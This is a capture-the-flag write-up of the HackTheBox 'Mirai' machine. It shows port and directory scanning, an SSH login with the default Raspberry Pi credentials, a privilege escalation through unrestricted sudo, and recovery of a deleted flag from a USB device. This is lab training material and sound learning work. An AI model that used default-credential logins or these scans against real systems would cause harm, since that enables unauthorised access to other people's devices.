Welcome to the Mirai writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Mirai

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:19 CEST
Nmap scan report for 10.10.10.48
Host is up (0.096s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1536/tcp  open  ampr-inter
32400/tcp open  plex
32469/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 61.16 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,53,80,1536,32400,32469 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:21 CEST
Nmap scan report for 10.10.10.48
Host is up (0.095s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn´t have a title (text/html; charset=UTF-8).
1536/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   96.63 ms 10.10.14.1
2   96.80 ms 10.10.10.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.90 seconds

Port 80

The port 80 web seems empty. We are going to list directories.

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,zip,rar,tar,bak,php
[+] Timeout:        10s
===============================================================
2021/05/07 16:54:21 Starting gobuster
===============================================================
/admin (Status: 301)
/versions (Status: 200)
===============================================================
2021/05/07 16:59:07 Finished
===============================================================

Well, inside the admin directory we find a Pi-hole installation. Let's list again.

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/admin/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48/admin/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip,rar,tar,bak
[+] Timeout:        10s
===============================================================
2021/05/07 16:56:04 Starting gobuster
===============================================================
/LICENSE (Status: 200)
/api.php (Status: 200)
/debug.php (Status: 200)
/help.php (Status: 200)
/img (Status: 301)
/index.php (Status: 200)
/list.php (Status: 200)
/queries.php (Status: 200)
/scripts (Status: 301)
/settings.php (Status: 200)
/style (Status: 301)
===============================================================
2021/05/07 17:00:51 Finished
===============================================================

I don't find anything interesting... We have seen that DNS port 53 is open but searching the web of the Pi-hole found and in the web of port 32400 I have not found any domain so we are going to add to our file /etc/hosts the domain mirai.htb and try accessing port 80 again.

This time we find a message that tells us that this domain is restricted.

<script src="http://pi.hole/admin/scripts/pi-hole/js/queryads.js"></script>

But if we look at the source code we can find a line where it refers to the pi.hole domain so we are going to change the mirai.htb domain to pi.hole in our hosts file.

And when accessing the domain... Surprise! we access the installation Pi-hole that we had already found! 😂

After looking and listing for a long time without finding anything, knowing that Pi-hole is a Raspberry Pi installation we can look for default credentials for SSH and test if they work.

And in this official post they indicate that the default user is pi and the password is raspberry.

Exploitation

SSH

And testing with these credentials, we are inside...

$ ssh [email protected]
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
[email protected]'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

[email protected]:~ $ ls
background.jpg  Desktop  Documents  Downloads  Music  oldconffiles  Pictures  Public  python_games  Templates  Videos
[email protected]:~ $ cd Desktop/
[email protected]:~/Desktop $ ls
Plex  user.txt
[email protected]:~/Desktop $ cat user.txt 
CENSORED_FLAG

Post exploitation

Privilege escalation: pi to root

Sudo

[email protected]:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Really? directly root? I hope not!

[email protected]:~/Desktop $ sudo su
[email protected]:/home/pi/Desktop# cd /root
[email protected]:~# ls
root.txt
[email protected]:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

Oh! yes we are root but we have to find the flag!! that's good!

Finding root flag

By listing the storage devices we can see that there is a secondary storage called sdb.

[email protected]:~# ls /dev/sd*
/dev/sda  /dev/sda1  /dev/sda2  /dev/sdb

As we can see, the device is mounted on /media/usbstick

[email protected]:~# mount | grep sdb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)

Let's see what it contains.

[email protected]:~# cd /media/usbstick/
[email protected]:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
[email protected]:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Have you cleared my flag? clumsy...
Let's try to get it back.

[email protected]:~# grep -a -C 500 'root.txt' /dev/sdb > /tmp/recover
[email protected]:~# strings /tmp/recover
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
CENSORED_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Now, among the strings that it returns, we have the root flag.